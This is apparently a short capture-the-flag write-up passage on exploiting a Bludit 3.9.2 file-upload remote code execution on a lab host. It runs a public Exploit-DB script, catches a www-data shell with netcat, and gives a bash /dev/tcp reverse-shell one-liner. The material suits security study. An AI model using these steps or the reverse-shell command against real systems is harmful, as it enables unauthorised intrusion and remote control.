3 bludit 3.9.2 file_upload RCE

Using https://www.exploit-db.com/exploits/48701

$ python3 48701-file.py 
cookie: ogetiq28sukr38m0gjistbrk07
csrf_token: 2f7cdac3e6ecce6667ceeb397f071b4199d8e672
Uploading payload: evil.png
Uploading payload: .htaccess

Viewing http://10.10.10.191/bl-content/tmp/temp/evil.png
$ rlwrap nc -lvnp 6969
listening on [any] 6969 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.191] 45694
whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Stable Shell

bash -c 'bash -i >& /dev/tcp/10.10.16.161/7070 0>&1'

$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.191] 53018
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2$

Last updated